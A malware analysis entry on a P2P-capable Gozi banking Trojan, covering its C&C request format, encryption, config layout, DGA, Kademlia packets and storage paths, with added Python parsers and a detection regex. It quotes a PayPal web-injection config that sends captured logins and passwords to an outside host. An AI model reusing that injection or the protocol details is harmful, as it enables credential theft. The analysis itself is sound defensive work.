Trojan.Gozi
sha1 (p2p version): 0fb30e03f71f0a20340ca0cb634e6250c14a1109
sha1 installer: 1720115a8a646f4a0a3741cec7266b82ff065a7e
sha1 client.dll x32: 0690ef42ff894dd85be873b4d95183a1af5f9a72
sha1 client.dll x64: 2d9cb08d9f4ed28c55a93355c7e5ae39b1f43488
sha1 vnc32: 3bb13d9d4b4eaabb314d90d294119d2f982736ac
sha1 vnc64: 17930b20f98ac7e92d28598901710254f1cf6315
A modified version of a well-known banking Trojan that is able to create a P2P botnet. It can perform the following functions:
- Steals login credentials from web data forms (formgrabbing)
- Logs keystrokes on the infected computer (keylogging)
- Injects arbitrary content into webpages loaded in browser windows (web injections)
- Uses Virtual Network Computing (VNC) in order to get remote access to the computer’s desktop
- Runs a SOCKS proxy server on command
- Downloads and installs plug-ins
To transmit information, the Trojan uses the HTTP protocol. The information is encrypted and embedded in the URL of a GET request, which looks as follows:
http://made****h.pw/images/EYI/uE4P5lkUATTfrO/L4Iv7VEvWWlYBM9qKuE67ixOoebU1ef9HHS7Xvwhns0obfoegeauxh8PajwSUrNkSFTtqnU/Fy/MyNURytngSxc_2FYvcf9O98PFCv2bBHEE//jMiPVxyqqgQ/f_2/FBgMUnmhszPJ5_2BuSA.gif
After decryption, the following line is obtained:
jkwerhw=sdalfwewesd3&server=12&crc=7b033&version=214721&user=55deba95d542febdab0e1570986cdaf0&soft=1&id=1045
Where:
server, id—retrieved from the Trojan’s configuration;
user—unique bot identifier;
crc—crc32 of the configuration (if the crc32 function is missing, the value is obtained using the GetTickCount function).
The Trojan sends requests to various types of scripts:
- .jpeg—request for web injection configuration;
- .gif—request for a personal task;
- .bmp—sending logs to the server; data is transmitted as multipart/form-data.
The server's response is encrypted with the RSA+Serpent+XOR algorithms. If the message contains web injections, they are additionally compressed with aplib. Such messages consist of separate blocks:
struct block_t
{
DWORD size; //length of data, including the terminating zero byte
BYTE data[size]; //a string terminated by a zero byte
}
An example of a web injection into the PayPal webpage:
*paypal.*
id="js_transactionCollection"
id="js_transactionCollection" style="visibility:hidden"
...
Order
*paypal.com/*/cgi-bin/merchantpaymentweb*
PROCESS
check.unitssl.com/log.php?action=log&text=pp;l=@login@;p=@pass@&botid=@ID@
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_email
login
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_password
pass
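As an added example that is not part of the original page, the following Python code splits a decrypted and decompressed message into its block_t records, with bounds checks so that a block whose declared size overruns the message is reported instead of being read past the end. The sample message is constructed here from the first three lines of the PayPal injection above; that each line occupies one block is an assumption of this example, not something the page states.

```python
"""Added example (not code from the page): parse block_t records of a
decrypted, aplib-decompressed Trojan.Gozi web-injection message."""
import struct


def parse_blocks(message: bytes) -> list[str]:
    """Split message into consecutive {DWORD size; BYTE data[size]} blocks.

    data is a zero-terminated string; the terminator is stripped. A block
    whose declared size runs past the end of the message raises ValueError
    rather than being read out of bounds."""
    blocks = []
    off = 0
    while off < len(message):
        if off + 4 > len(message):
            raise ValueError(f"truncated block header at offset {off}")
        (size,) = struct.unpack_from("<I", message, off)
        off += 4
        if off + size > len(message):
            raise ValueError(f"block at offset {off - 4} declares {size} bytes, "
                             f"only {len(message) - off} remain")
        blocks.append(message[off:off + size].rstrip(b"\x00").decode("latin-1"))
        off += size
    return blocks


def is_well_formed(message: bytes) -> bool:
    """True if every block's size field stays within the message."""
    try:
        parse_blocks(message)
        return True
    except ValueError:
        return False


def build_message(strings: list[str]) -> bytes:
    """Constructed helper (not the Trojan's code): pack strings into block_t records."""
    out = bytearray()
    for s in strings:
        data = s.encode("latin-1") + b"\x00"
        out += struct.pack("<I", len(data)) + data
    return bytes(out)


# Constructed sample: the first three lines of the PayPal injection quoted
# above, assumed here to be one block each.
SAMPLE_STRINGS = [
    "*paypal.*",
    'id="js_transactionCollection"',
    'id="js_transactionCollection" style="visibility:hidden"',
]

if __name__ == "__main__":
    for i, s in enumerate(parse_blocks(build_message(SAMPLE_STRINGS))):
        print(i, s)
    # A message cut off mid-block is rejected instead of being misparsed.
    print("truncated message well-formed:", is_well_formed(build_message(SAMPLE_STRINGS)[:-3]))
```

The length check before each slice is the part that matters in practice: a parser that trusts the size field is exactly the kind of code a malformed response can push out of bounds.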
The last section of the executable file stores the directory of the Trojan's configuration data:
2E 72 65 6C-6F 63 00 00-00 30 00 00-00 10 02 00  .reloc...0......
00 26 00 00-00 D8 01 00-00 00 00 00-00 00 00 00  .&..............
00 00 00 00-40 00 00 40-00 00 00 00-00 00 00 00  ....@..@........
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
4A 31 00 00-00 32 02 00-84 00 00 00-64 5E 28 E1  J1...2......d^(.
00 01 01 00-4A 31 00 00-00 34 02 00-81 01 00 00  ....J1...4......
CB AF 22 D7-00 20 01 00-00 00 00 00-00 00 00 00  ...". ..........
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
The configuration directory is located by searching for the 0x314A magic value; each of its entries has the following structure:
struct config_block_t
{
WORD magic; //0x314A
WORD numHashes; //number of entries in hashes[]
DWORD pos; //RVA of the configuration
DWORD size; //size of the configuration
DWORD id; //configuration ID
DWORD flag; //0x10000 = aplib compression
DWORD hashes[numHashes];
};
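As an added example (not code from the page or from the Trojan), the following Python script locates the configuration directory by the 0x314A magic and parses its config_block_t entries, using the hex dump above as constructed input with the ASCII column removed. The `pos` field is an RVA, so reading the configuration blob itself would additionally require translating it to a file offset through the section table and, when the 0x10000 flag is set, aplib decompression; both are outside this example.

```python
"""Added example (not from the page): find and parse config_block_t entries
in the last section of a Trojan.Gozi sample."""
import struct

CONFIG_MAGIC = 0x314A
FLAG_APLIB = 0x10000
# magic (WORD), numHashes (WORD), pos, size, id, flag (DWORDs), little-endian
HEADER = struct.Struct("<HHIIII")

# Constructed sample input: the first lines of the hex dump quoted above.
# The first 40 bytes are the .reloc section header; the directory entries
# start at offset 80.
SAMPLE_DUMP = """
2E 72 65 6C 6F 63 00 00 00 30 00 00 00 10 02 00
00 26 00 00 00 D8 01 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
4A 31 00 00 00 32 02 00 84 00 00 00 64 5E 28 E1
00 01 01 00 4A 31 00 00 00 34 02 00 81 01 00 00
CB AF 22 D7 00 20 01 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
"""


def dump_to_bytes(dump: str) -> bytes:
    """Turn a whitespace-separated hex dump into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def parse_config_entries(section: bytes) -> list[dict]:
    """Walk consecutive config_block_t entries starting at the first magic.

    Parsing stops at the first entry whose magic does not match or which
    would run past the end of the section."""
    off = section.find(CONFIG_MAGIC.to_bytes(2, "little"))
    if off < 0:
        return []
    entries = []
    while off + HEADER.size <= len(section):
        magic, num_hashes, pos, size, cfg_id, flag = HEADER.unpack_from(section, off)
        if magic != CONFIG_MAGIC:
            break
        hashes_off = off + HEADER.size
        if hashes_off + 4 * num_hashes > len(section):
            break  # truncated entry
        hashes = [struct.unpack_from("<I", section, hashes_off + 4 * i)[0]
                  for i in range(num_hashes)]
        entries.append({
            "offset": off,
            "pos": pos,
            "size": size,
            "id": cfg_id,
            "flag": flag,
            "aplib": bool(flag & FLAG_APLIB),
            "hashes": hashes,
        })
        off = hashes_off + 4 * num_hashes
    return entries


if __name__ == "__main__":
    for e in parse_config_entries(dump_to_bytes(SAMPLE_DUMP)):
        print(f"entry @{e['offset']:#x}: rva={e['pos']:#x} size={e['size']:#x} "
              f"id={e['id']:#010x} flag={e['flag']:#x} aplib={e['aplib']}")
```

Run on the dump above, the script yields two entries, both with the aplib bit set: one at RVA 0x23200 of 0x84 bytes and one at RVA 0x23400 of 0x181 bytes. Checking that every entry's RVA falls inside the last section's virtual range is a cheap sanity test before attempting decompression.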
If the relevant flag is set, the retrieved data is unpacked with aplib. The unpacked configuration, together with its parameters, looks as follows:
{"GROUP": "1045", "1481529637": "10", "SENDTIMEOUT": "200", "BCTIMEOUT": "10",
"CONFIGFAILTIMEOUT": "200", "TASKTIMEOUT": "200", "DGA_SEED": "1", "HOSTS": "127.0.0.1",
"SERVERKEY": "87654321POIUYTRE", "SERVER": "12", "KNOCKERTIMEOUT": "200",
"CONFIGTIMEOUT": "200", "287775871": "1"}
Where:
GROUP—id in the request; SERVER—server in the request;
DGA_SEED—DGA initialization constant;
SERVERKEY—key for serpent;
HOSTS—space-separated list of C&C servers.
Trojan.Gozi employs a domain generation algorithm (DGA). To do this, the Trojan downloads a text file from a NASA server:
http://nssdc.gsfc.nasa.gov/planetary/text/pioneer-11_endops.txt
Using words contained in the text file, the Trojan derives from the current date, by means of a special algorithm, the domain name of the C&C server. Every 15 days, the Trojan automatically changes its control server address. All transferred information is encrypted.
To build the P2P botnet, a Kademlia-based protocol is used. UDP packets are encrypted with RC4 and have the following structure:
struct kad_t
{
BYTE flag; //random value except for the two lowest bits: bit 0 = the packet is encrypted with sendKey; bit 1 = (1) the packet is encrypted with sendKey=0 or (0) with sendKey=nid1^nid2^nid3^nid4
DWORD rndKey; //random component of the key
kad_transport_t transport; //encrypted
kad_head_t head; //encrypted
BYTE data[]; //encrypted
}
struct kad_transport_t
{
DWORD magic; //the 0x395F2EC1 value
DWORD sendKey; //random value used to encrypt responses
DWORD recvKey;
}
struct kad_head_t
{
BYTE opType; //0xe4 - UDP KAD
BYTE op; //commands of the protocol
WORD size; //length of kad_t.data
};
Received and downloaded files are stored at:
%APPDATA%\Microsoft\{%08X-%04X-%04X-%04X-%08X%04X}\<md5hashOfName>
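As an added example that is not part of the original page, the following Python code turns the storage path layout above into a hunting check over file-creation log lines: a GUID-named folder directly under %APPDATA%\Microsoft whose file name is 32 hex characters. The log lines are constructed here in a Sysmon-like format and are not from any real host.

```python
"""Added example (not from the page): flag file paths matching the
Trojan.Gozi storage directory layout."""
import re

# %APPDATA%\Microsoft\{%08X-%04X-%04X-%04X-%08X%04X}\<md5hashOfName>
# %X prints uppercase hex, but Windows paths are case-insensitive and log
# pipelines often normalise case, so the whole match is case-insensitive.
# Both the unexpanded %APPDATA% form and its expanded \AppData\Roaming form
# are accepted, since tools log either.
STORAGE_PATH_RE = re.compile(
    r"(?:%APPDATA%|\\AppData\\Roaming)\\Microsoft\\"
    r"\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}"
    r"\\[0-9A-F]{32}(?=$|[\s\"'])",
    re.IGNORECASE,
)


def find_storage_paths(log_lines: list[str]) -> list[str]:
    """Return the matching storage paths found in the given log lines."""
    hits = []
    for line in log_lines:
        m = STORAGE_PATH_RE.search(line)
        if m:
            hits.append(m.group(0))
    return hits


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    r"FileCreate TargetFilename: C:\Users\alice\AppData\Roaming\Microsoft"
    r"\{0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9}\9e107d9d372bb6826bd81d3542a419d6",
    r"FileCreate TargetFilename: C:\Users\alice\AppData\Roaming\Microsoft"
    r"\Windows\Recent\report.lnk",
    r"FileCreate TargetFilename: C:\Users\alice\AppData\Roaming\Microsoft"
    r"\{0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9}\plugin.dll",
    r"FileCreate TargetFilename: %APPDATA%\Microsoft"
    r"\{0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9}\d41d8cd98f00b204e9800998ecf8427e",
]

if __name__ == "__main__":
    for path in find_storage_paths(SAMPLE_LOG):
        print("suspicious storage path:", path)
```

A hit is a lead for triage rather than a verdict on its own: it is worth correlating with the HTTP request pattern and the hashes listed at the top of this entry before acting on it.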